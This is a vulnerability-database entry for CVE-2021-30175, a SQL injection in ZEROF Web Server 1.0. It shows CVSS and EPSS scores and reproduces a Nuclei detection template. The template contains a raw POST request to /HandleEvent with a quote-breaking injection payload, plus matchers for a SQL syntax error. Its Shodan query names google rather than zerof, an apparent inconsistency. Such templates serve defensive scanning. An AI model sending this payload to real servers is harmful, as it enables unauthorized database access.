Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-30175
HistorySep 29, 2022 - 4:39 p.m.

ZEROF Web Server 1.0 - SQL Injection

2022-09-2916:39:24
ProjectDiscovery
github.com
17

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

0.071 Low

EPSS

Percentile

94.0%

ZEROF Web Server 1.0 (April 2021) allows SQL Injection via the /HandleEvent endpoint for the login page.
id: CVE-2021-30175

info:
  name: ZEROF Web Server 1.0 - SQL Injection
  author: edoardottt
  severity: critical
  description: |
    ZEROF Web Server 1.0 (April 2021) allows SQL Injection via the /HandleEvent endpoint for the login page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in ZEROF Web Server 1.0.
  reference:
    - https://github.com/awillix/research/blob/main/cve/CVE-2021-30175.md
    - https://nvd.nist.gov/vuln/detail/CVE-2021-30175
    - https://pro.zerof.ru
    - https://github.com/awillix/research
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-30175
    cwe-id: CWE-89
    epss-score: 0.06252
    epss-percentile: 0.93587
    cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zerof
    product: web_server
    shodan-query: cpe:"cpe:2.3:a:google:web_server"
  tags: cve2021,cve,zerof,sqli

http:
  - raw:
      - |
        POST /HandleEvent HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        Ajax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff"&_seq_=2&_uo_=O

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "You have an error in your SQL syntax"

      - type: word
        part: header
        words:
          - "ZEROF"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a47338e93a3380bdd7bc5a4388204db5a900c3e05631373e87c4045eaeec0f28022100f6dc9fae8ee94178b7f3cefefae67dce3a308540eabe3d1b1a82752b753fc2d9:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

0.071 Low

EPSS

Percentile

94.0%

Related for NUCLEI:CVE-2021-30175